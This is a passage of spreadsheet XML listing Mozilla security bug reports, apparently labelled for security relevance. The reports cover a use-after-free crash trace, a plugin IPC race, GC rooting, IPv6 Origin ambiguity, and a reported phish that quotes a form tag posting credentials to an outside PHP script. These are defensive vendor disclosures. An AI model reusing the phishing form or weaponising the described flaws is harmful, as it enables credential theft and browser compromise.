          <t>Created attachment 624862
Testcase
Reproduces on trunk
20120517130245
http://hg.mozilla.org/mozilla-central/rev/895e12563245
=================================================================
==6180== ERROR: AddressSanitizer heap-use-after-free on address 0x7f861c5860b8 at pc 0x7f863c987298 bp 0x7fff028995e0 sp 0x7fff028995d8
READ of size 8 at 0x7f861c5860b8 thread T0
    #0 0x7f863c987298 in gfxTextRun::GetUserData() const src/modules/zlib/src/inffast.c:0
0x7f861c5860b8 is located 56 bytes inside of 6712-byte region [0x7f861c586080,0x7f861c587ab8)
freed by thread T0 here:
    #0 0x4244a2 in free 
    #1 0x7f863c9941bd in nsTextFrame::ClearTextRuns() src/layout/generic/nsTextFrame.h:432
previously allocated by thread T0 here:
    #0 0x424562 in malloc 
    #1 0x7f863e38da84 in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) src/gfx/thebes/gfxFont.cpp:4290
==6180== ABORTING
Stats: 125M malloced (131M for red zones) by 252339 calls
Stats: 28M realloced by 12734 calls
Stats: 85M freed by 119994 calls
Stats: 0M really freed by 0 calls
Stats: 292M (74798 full pages) mmaped in 73 calls
  mmaps   by size class: 8:212979; 9:40955; 10:12285; 11:12282; 12:3072; 13:2048; 14:1536; 15:384; 16:576; 17:96; 18:144; 19:40; 20:16;
  mallocs by size class: 8:191798; 9:34053; 10:9717; 11:10403; 12:2011; 13:1813; 14:1446; 15:277; 16:565; 17:65; 18:139; 19:39; 20:13;
  frees   by size class: 8:80912; 9:21306; 10:5944; 11:7541; 12:1292; 13:971; 14:1169; 15:231; 16:498; 17:52; 18:29; 19:38; 20:11;
  rfrees  by size class:
Stats: malloc large: 256 small slow: 1500
Shadow byte and word:
  0x1ff0c38b0c17: fd
  0x1ff0c38b0c10: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ff0c38b0bf0: fa fa fa fa fa fa fa fa
  0x1ff0c38b0bf8: fa fa fa fa fa fa fa fa
  0x1ff0c38b0c00: fa fa fa fa fa fa fa fa
  0x1ff0c38b0c08: fa fa fa fa fa fa fa fa
=&gt;0x1ff0c38b0c10: fd fd fd fd fd fd fd fd
  0x1ff0c38b0c18: fd fd fd fd fd fd fd fd
  0x1ff0c38b0c20: fd fd fd fd fd fd fd fd
  0x1ff0c38b0c28: fd fd fd fd fd fd fd fd
  0x1ff0c38b0c30: fd fd fd fd fd fd fd fd</t>
        </is>
      </c>
      <c r="X3853" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3854">
      <c r="A3854" t="n">
        <v>977955</v>
      </c>
      <c r="B3854" t="inlineStr">
        <is>
          <t>2014-02-27 19:00:36 -0800</t>
        </is>
      </c>
      <c r="C3854" t="inlineStr">
        <is>
          <t>PluginModuleParent may delete its subprocess before calling MessageChannel::Clear, resulting in badness</t>
        </is>
      </c>
      <c r="D3854" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E3854" t="n">
        <v>1</v>
      </c>
      <c r="F3854" t="n">
        <v>1</v>
      </c>
      <c r="G3854" t="n">
        <v>6</v>
      </c>
      <c r="H3854" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3854" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3854" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K3854" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3854" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3854" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3854" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3854" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3854" t="inlineStr">
        <is>
          <t>[adv-main29+] ESR-24 variant is sec-moderatish</t>
        </is>
      </c>
      <c r="Q3854" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3854" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3854" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T3854" t="n">
        <v>1</v>
      </c>
      <c r="U3854" t="n">
        <v>0</v>
      </c>
      <c r="V3854" t="n">
        <v>22</v>
      </c>
      <c r="W3854" t="inlineStr">
        <is>
          <t>I-think-I-found-the-cause-of-bug-974933 attempt #3:
1) PluginModuleParent contains a PluginProcessParent, mSubprocess. When PluginModuleParent is created by static ::LoadModule, It passes parent-&gt;mSubprocess-&gt;GetChannel() to parent-&gt;Open(). [A]
2) PluginModuleParent::Open(), calls PluginModuleParent-&gt;mChannel-&gt;Open(), which is a MessageChannel.
3) MessageChannel::Open creates a ProcessLink, mLink, and passes it the channel from the subprocess in (1) [B]
4) NP_Initialize returns an error from the plugin. We set mShutdown = true without actually calling NP_Shutdown. [E] There are a few other pathways that do something similar [C] [D] (maybe [F], but the callers I checked are caused by channel shutdown)
5) We decide to destroy PluginModuleParent, and call in order:
   - ~PluginModuleParent
     - mSubprocess-&gt;Destroy()
   - ~MessageChannel (PluginModuleParent.mChannel destructor)
     - MessageChannel::Clear
       - delete mLink
         - ~ProcessLink
           - mTransport-&gt;set_listener();
mTransport is the channel obtained from mSubprocess in (1)
6) mSubprocess-&gt;Destroy() queues a task on the io thread to run |delete this|. This task then races with us getting to MessageChannel::Clear. If it wins the race, MessageChannel.mLink now has a poisoned mTransport, and we crash.
This can be reproduced in a debugger by breaking at [G] and [E]. Fudge the plugin return code at [E]* and stop the main thread at [G] so the iothread wins the race. Backtrace attached, which appears identical to the bug 974933 crashes:
  https://crash-stats.mozilla.com/report/index/c68aee10-a11f-4191-ab54-298b12140227
* I'm not sure about this part -- we can't call NP_Shutdown or MessageChannel::Clear() will prevent the race. Any of the abnormal-failure paths that set |mShutdown = true| without calling ::Clear might be triggering this.
[A] http://dxr.mozilla.org/mozilla-central/source/dom/plugins/ipc/PluginModuleParent.cpp#97
[B] http://dxr.mozilla.org/mozilla-central/source/ipc/glue/MessageChannel.cpp#296
[C] http://dxr.mozilla.org/mozilla-central/source/dom/plugins/ipc/PluginModuleParent.cpp#1196
[D] http://dxr.mozilla.org/mozilla-central/source/dom/plugins/ipc/PluginModuleParent.cpp#111
[E] http://dxr.mozilla.org/mozilla-central/source/dom/plugins/ipc/PluginModuleParent.cpp#1228
[F] http://dxr.mozilla.org/mozilla-central/source/dom/plugins/ipc/PluginModuleParent.cpp#731
[G] http://dxr.mozilla.org/mozilla-central/source/dom/plugins/ipc/PluginProcessParent.cpp#82</t>
        </is>
      </c>
      <c r="X3854" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3855">
      <c r="A3855" t="n">
        <v>883450</v>
      </c>
      <c r="B3855" t="inlineStr">
        <is>
          <t>2013-06-14 16:47:54 -0700</t>
        </is>
      </c>
      <c r="C3855" t="inlineStr">
        <is>
          <t>Conservative Stack Scanner doesn't work when not in a request</t>
        </is>
      </c>
      <c r="D3855" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:53 -0800</t>
        </is>
      </c>
      <c r="E3855" t="n">
        <v>1</v>
      </c>
      <c r="F3855" t="n">
        <v>1</v>
      </c>
      <c r="G3855" t="n">
        <v>3</v>
      </c>
      <c r="H3855" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3855" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3855" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3855" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3855" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3855" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3855" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3855" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3855" t="inlineStr">
        <is>
          <t>[Embargo until ESR17 EOL][adv-main24+]</t>
        </is>
      </c>
      <c r="Q3855" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3855" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3855" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T3855" t="n">
        <v>1</v>
      </c>
      <c r="U3855" t="n">
        <v>0</v>
      </c>
      <c r="V3855" t="n">
        <v>42</v>
      </c>
      <c r="W3855" t="inlineStr">
        <is>
          <t>I've been debugging bug 879649 for a good day and a half now, and finally figured out what's going on.
In bug MarkConservativeStackRoots, we bail out of stack scanning if !cgcd-&gt;hasStackToScan():
http://mxr.mozilla.org/mozilla-central/source/js/src/gc/RootMarking.cpp#316
This predicate just evaluates to !!nativeStackTop - that is to say, whether we have a usable pointer to the top of the stack. This pointer is generated in RecordNativeStackTopForGC, but is then _cleared_ in updateForRequestEnd(), which gets called when our request count drops to zero:
http://mxr.mozilla.org/mozilla-central/source/js/src/jsapi.cpp#1230
And though RecordNativeStackTopForGC is called at the beginning of Collect(), it no-ops because the request depth is zero:
http://mxr.mozilla.org/mozilla-central/source/js/src/jsgc.cpp#963
This means that _anything_ on the stack outside of a request isn't rooted at all. I wouldn't be surprised if there were dozens of such cases in the browser - especially from consumers of nsIScriptContext functions, who don't necessarily have a need to enter a request themselves.
Marking sec-critical, because the surface is wide enough that there's almost certainly an exploitable case somewhere.</t>
        </is>
      </c>
      <c r="X3855" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3856">
      <c r="A3856" t="n">
        <v>694576</v>
      </c>
      <c r="B3856" t="inlineStr">
        <is>
          <t>2011-10-14 08:57:41 -0700</t>
        </is>
      </c>
      <c r="C3856" t="inlineStr">
        <is>
          <t>Ambiguous IPv6 in Origin (and Sec-WebSocket-Origin) request header</t>
        </is>
      </c>
      <c r="D3856" t="inlineStr">
        <is>
          <t>2015-08-09 14:40:05 -0700</t>
        </is>
      </c>
      <c r="E3856" t="n">
        <v>1</v>
      </c>
      <c r="F3856" t="n">
        <v>1</v>
      </c>
      <c r="G3856" t="n">
        <v>3</v>
      </c>
      <c r="H3856" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3856" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3856" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K3856" t="inlineStr">
        <is>
          <t>9 Branch</t>
        </is>
      </c>
      <c r="L3856" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3856" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3856" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3856" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3856" t="inlineStr">
        <is>
          <t>[sg:moderate][qa-]</t>
        </is>
      </c>
      <c r="Q3856" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3856" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3856" t="inlineStr">
        <is>
          <t>mozilla12</t>
        </is>
      </c>
      <c r="T3856" t="n">
        <v>1</v>
      </c>
      <c r="U3856" t="n">
        <v>0</v>
      </c>
      <c r="V3856" t="n">
        <v>25</v>
      </c>
      <c r="W3856" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Steps to reproduce:
having a html page on a web server listening on a non-80 port, and accessing such page specifiyng as host the IPv6 of such webserver (obviously plus its port...):
If you open a cross-site XHR or WebSocket it will result in the browser sending an ambiguous Origin (or Sec-WebSocket-Origin) header if the said IPv6 contains at least 2 consecutive 16-bit fields of 0s. 
I think that at least at the moment this ambiguity does not pose security issues as I expect that most resources will not have a Origin permission list based on IPv6, but I'm flagging the hidden check anyway (better safe than sorry...)
I've seen the same behaviour on Firefox 7.0.1 and Aurora 9.0a2 
related specs/drafts:
CORS http://www.w3.org/TR/cors
WebSockets http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-17
IPv6 http://tools.ietf.org/html/rfc5952
Origin http://tools.ietf.org/html/draft-ietf-websec-origin-06 &amp; http://tools.ietf.org/html/draft-abarth-origin-09
Actual results:
Let's say that the web server is listening on port 8888 and can be reached with its IPv6 that is aa80:0000:0000:0000:19b7:231e:ff5d:34e3 (that compressed is aa80::19b7:231e:ff5d:34e3).
The Origin header generated by Firefox will be like this:
http://aa80::19b7:231e:ff5d:34e3:8888
Now let's say that the web server is listening on port 80 and can be reached with its IPv6 that is aa80:0000:0000:19b7:231e:ff5d:34e3:8888 (that compressed is aa80::19b7:231e:ff5d:34e3:8888). 
The Origin header generated by Firefox will be the same:
http://aa80::19b7:231e:ff5d:34e3:8888
Expected results:
The ambiguity is easily solved using square brakets so that the 2 Origins can be
http://[aa80::19b7:231e:ff5d:34e3]:8888
and 
http://[aa80::19b7:231e:ff5d:34e3:8888]
(at least Chrome behave like this)</t>
        </is>
      </c>
      <c r="X3856" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3857">
      <c r="A3857" t="n">
        <v>1434634</v>
      </c>
      <c r="B3857" t="inlineStr">
        <is>
          <t>2018-01-31 08:12:26 -0800</t>
        </is>
      </c>
      <c r="C3857" t="inlineStr">
        <is>
          <t>Incomplete fix of bug 1366357</t>
        </is>
      </c>
      <c r="D3857" t="inlineStr">
        <is>
          <t>2020-04-06 02:05:35 -0700</t>
        </is>
      </c>
      <c r="E3857" t="n">
        <v>1</v>
      </c>
      <c r="F3857" t="n">
        <v>1</v>
      </c>
      <c r="G3857" t="n">
        <v>2</v>
      </c>
      <c r="H3857" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3857" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3857" t="inlineStr">
        <is>
          <t>Site Identity</t>
        </is>
      </c>
      <c r="K3857" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3857" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3857" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3857" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3857" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3857" t="inlineStr">
        <is>
          <t>[fixed by bug 1371741][post-critsmash-triage][adv-main66+]</t>
        </is>
      </c>
      <c r="Q3857" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3857" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3857" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3857" t="n">
        <v>1</v>
      </c>
      <c r="U3857" t="n">
        <v>0</v>
      </c>
      <c r="V3857" t="n">
        <v>13</v>
      </c>
      <c r="W3857" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36
Steps to reproduce:
1. Go to https://vuln.shhnjk.com/iframer.php?url=//test.shhnjk.com/permission.html
2. Click on "Cam Data" button
Actual results:
Permission notification says "Unknown origin" is requesting permission.
Expected results:
Bug 1366357 fix made "Unknown protocol" to "Unknown origin", which I don't think solved the issue of confusing permission request.
Tested in Latest Nightly.</t>
        </is>
      </c>
      <c r="X3857" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3858">
      <c r="A3858" t="n">
        <v>1261651</v>
      </c>
      <c r="B3858" t="inlineStr">
        <is>
          <t>2016-04-02 17:51:39 -0700</t>
        </is>
      </c>
      <c r="C3858" t="inlineStr">
        <is>
          <t>Various animation inspector tests are going to permafail when Gecko 48 merges to Aurora (TypeError: el.animate is not a function at @http://example.com/browser/devtools/client/animationinspector/test/doc_simple_animation.html:120:5)</t>
        </is>
      </c>
      <c r="D3858" t="inlineStr">
        <is>
          <t>2018-06-13 10:22:28 -0700</t>
        </is>
      </c>
      <c r="E3858" t="n">
        <v>1</v>
      </c>
      <c r="F3858" t="n">
        <v>1</v>
      </c>
      <c r="G3858" t="n">
        <v>3</v>
      </c>
      <c r="H3858" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3858" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J3858" t="inlineStr">
        <is>
          <t>Inspector: Animations</t>
        </is>
      </c>
      <c r="K3858" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3858" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3858" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3858" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3858" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3858" t="inlineStr">
        <is>
          <t>[btpp-fix-now]</t>
        </is>
      </c>
      <c r="Q3858" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3858" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3858" t="inlineStr">
        <is>
          <t>Firefox 48</t>
        </is>
      </c>
      <c r="T3858" t="n">
        <v>1</v>
      </c>
      <c r="U3858" t="n">
        <v>0</v>
      </c>
      <c r="V3858" t="n">
        <v>12</v>
      </c>
      <c r="W3858" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]: Devtools permafail when Gecko 48 merges to Aurora in two weeks.
https://treeherder.mozilla.org/logviewer.html#?job_id=18975270&amp;repo=try
TEST-UNEXPECTED-FAIL | devtools/client/animationinspector/test/browser_animation_click_selects_animation.js | uncaught exception - TypeError: el.animate is not a function at @http://example.com/browser/devtools/client/animationinspector/test/doc_simple_animation.html:120:5</t>
        </is>
      </c>
      <c r="X3858" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3859">
      <c r="A3859" t="n">
        <v>1362198</v>
      </c>
      <c r="B3859" t="inlineStr">
        <is>
          <t>2017-05-04 14:38:31 -0700</t>
        </is>
      </c>
      <c r="C3859" t="inlineStr">
        <is>
          <t>Write copy for rate-limited page</t>
        </is>
      </c>
      <c r="D3859" t="inlineStr">
        <is>
          <t>2017-08-25 14:52:29 -0700</t>
        </is>
      </c>
      <c r="E3859" t="n">
        <v>1</v>
      </c>
      <c r="F3859" t="n">
        <v>1</v>
      </c>
      <c r="G3859" t="n">
        <v>7</v>
      </c>
      <c r="H3859" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3859" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J3859" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3859" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L3859" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3859" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3859" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3859" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3859" t="inlineStr"/>
      <c r="Q3859" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3859" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3859" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3859" t="n">
        <v>1</v>
      </c>
      <c r="U3859" t="n">
        <v>0</v>
      </c>
      <c r="V3859" t="n">
        <v>8</v>
      </c>
      <c r="W3859" t="inlineStr">
        <is>
          <t>Users surpassing a rate limit will be redirected to a page explaining they have been rate limited. Write copy for this that explains why user has been rate limited and alternatives for for bulk/research queries of bmo data.</t>
        </is>
      </c>
      <c r="X3859" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3860">
      <c r="A3860" t="n">
        <v>626959</v>
      </c>
      <c r="B3860" t="inlineStr">
        <is>
          <t>2011-01-19 00:15:22 -0800</t>
        </is>
      </c>
      <c r="C3860" t="inlineStr">
        <is>
          <t>[tracker] Notifications: Port apps to new API</t>
        </is>
      </c>
      <c r="D3860" t="inlineStr">
        <is>
          <t>2011-02-11 14:26:33 -0800</t>
        </is>
      </c>
      <c r="E3860" t="n">
        <v>1</v>
      </c>
      <c r="F3860" t="n">
        <v>1</v>
      </c>
      <c r="G3860" t="n">
        <v>5</v>
      </c>
      <c r="H3860" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3860" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3860" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3860" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3860" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3860" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3860" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3860" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3860" t="inlineStr"/>
      <c r="Q3860" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3860" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3860" t="inlineStr">
        <is>
          <t>2.5</t>
        </is>
      </c>
      <c r="T3860" t="n">
        <v>1</v>
      </c>
      <c r="U3860" t="n">
        <v>0</v>
      </c>
      <c r="V3860" t="n">
        <v>2</v>
      </c>
      <c r="W3860" t="inlineStr">
        <is>
          <t>Turn old notifications into Event subclasses, and update client code. Update other calls into the code that's going away. Bask in the joy of not having code you don't control depending on old framework.
This might be biggish, so feel free to hack off pieces, file them, and turn this into a tracker. If it's too much of a pain in the neck, we can rethink how much we want to/have to change the API.</t>
        </is>
      </c>
      <c r="X3860" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3861">
      <c r="A3861" t="n">
        <v>1012609</v>
      </c>
      <c r="B3861" t="inlineStr">
        <is>
          <t>2014-05-19 02:57:34 -0700</t>
        </is>
      </c>
      <c r="C3861" t="inlineStr">
        <is>
          <t>Out-of-Bounds Read in mozilla::dom::OscillatorNodeEngine::ComputeCustom with negative frequency</t>
        </is>
      </c>
      <c r="D3861" t="inlineStr">
        <is>
          <t>2024-05-30 08:34:37 -0700</t>
        </is>
      </c>
      <c r="E3861" t="n">
        <v>1</v>
      </c>
      <c r="F3861" t="n">
        <v>1</v>
      </c>
      <c r="G3861" t="n">
        <v>3</v>
      </c>
      <c r="H3861" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3861" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3861" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K3861" t="inlineStr">
        <is>
          <t>32 Branch</t>
        </is>
      </c>
      <c r="L3861" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3861" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3861" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3861" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3861" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q3861" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3861" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3861" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T3861" t="n">
        <v>1</v>
      </c>
      <c r="U3861" t="n">
        <v>0</v>
      </c>
      <c r="V3861" t="n">
        <v>33</v>
      </c>
      <c r="W3861" t="inlineStr">
        <is>
          <t>Created attachment 8424711
testcase.html
It's very similar to Bug 995289 but the source of the bug is now a negative frequency, not a high frequency. I have missed this because i have ignored the crash signature for a while.</t>
        </is>
      </c>
      <c r="X3861" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3862">
      <c r="A3862" t="n">
        <v>360493</v>
      </c>
      <c r="B3862" t="inlineStr">
        <is>
          <t>2006-11-12 13:34:51 -0800</t>
        </is>
      </c>
      <c r="C3862" t="inlineStr">
        <is>
          <t>Cross-Site Forms + Password Manager = Security Failure</t>
        </is>
      </c>
      <c r="D3862" t="inlineStr">
        <is>
          <t>2022-10-05 14:54:12 -0700</t>
        </is>
      </c>
      <c r="E3862" t="n">
        <v>1</v>
      </c>
      <c r="F3862" t="n">
        <v>1</v>
      </c>
      <c r="G3862" t="n">
        <v>3</v>
      </c>
      <c r="H3862" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3862" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3862" t="inlineStr">
        <is>
          <t>Password Manager</t>
        </is>
      </c>
      <c r="K3862" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3862" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3862" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3862" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3862" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3862" t="inlineStr">
        <is>
          <t>[sg:moderate] password stealing without XSS, but with &lt;input type="password"&gt;</t>
        </is>
      </c>
      <c r="Q3862" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3862" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3862" t="inlineStr">
        <is>
          <t>mozilla1.9alpha5</t>
        </is>
      </c>
      <c r="T3862" t="n">
        <v>1</v>
      </c>
      <c r="U3862" t="n">
        <v>30</v>
      </c>
      <c r="V3862" t="n">
        <v>394</v>
      </c>
      <c r="W3862" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manger!  
The underlying method was so obvious that it should have raised multiple warnings.  There were none at all.
It was in a MySpace profile that included this tag:
&lt;form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post"&gt;
What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.
Not only did FireFox fail to raise a warning, it auto-filled my www.myspace.com username and password into this form!!  I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website.
I even confirmed in the password manager that I do not have any passwords saved for the membres.lycos.fr domain.
I realize there is a consideration for cross-site functionality on certain subdomains.  However, I must say I am shocked that FireFox lacks a warning for both the POST element and the Password Manager in this case.
I would have been thoroughly fooled by this page were it not for a tiny formatting error that the phisher overlooked, and could have been easily fixed.  An unsuspecting user would only have to click the Login button on this legitimate-looking page for the phish to be complete.
This appears to be a huge problem!  I look forward to your response.
Robert Chapin
Chapin Information Services, Inc.
Reproducible: Always
Steps to Reproduce:
1. Visit http://www.myspace.com/1sweetstar
2. If "Invalid friend ID" appears, reload the page.  I found that every-other time this URL is visited it will present a login form.  It may be that the MySpace servers are propagating a deletion of this phish.
3. DO NOT login.  This URL is NOT valid for MySpace logins even though it is hosted by myspace.com.
4. View the source of this page, or try filling in fake credentials.
5. The page at membres.lycos.fr will re-direct you to home.myspace.com after stealing your username and password.  The phish is completely transparent.  If you are not already logged-in to myspace.com then home.myspace.com should re-direct you to login.myspace.com.  This last re-direct is normal.
More Generally:
1. Create two login forms on domain A.  One of them has an action on domain A and the other has an action on domain B.
2. View the first form at domain A and save a username and password.
3. Both forms will now behave the same, except one form is delivering your credentials to the correct party, the other is not.
Actual Results:  
Cross-site forms behave identically to same-site forms.
Expected Results:  
1. Cross-Site Form Element Warning
2. Cross-Site Password Manager Warning
3. Cross-Site Submit Warning
4. Given all the hype about FF2 anti-phishing technology, one might also expect some sort of anti-phishing message ;)
I can add a copy of the page source, if needed.  However, I suspect this problem can be easily confirmed using any two web domains.</t>
        </is>
      </c>
      <c r="X3862" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3863">
      <c r="A3863" t="n">
        <v>74032</v>
      </c>
      <c r="B3863" t="inlineStr">
        <is>
          <t>2001-03-29 15:47:03 -0800</t>
        </is>
      </c>
      <c r="C3863" t="inlineStr">
        <is>
          <t>Password stored in plaintext on the MySQL Data Base.</t>
        </is>
      </c>
      <c r="D3863" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:24 -0800</t>
        </is>
      </c>
      <c r="E3863" t="n">
        <v>1</v>
      </c>
      <c r="F3863" t="n">
        <v>1</v>
      </c>
      <c r="G3863" t="n">
        <v>4</v>
      </c>
      <c r="H3863" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
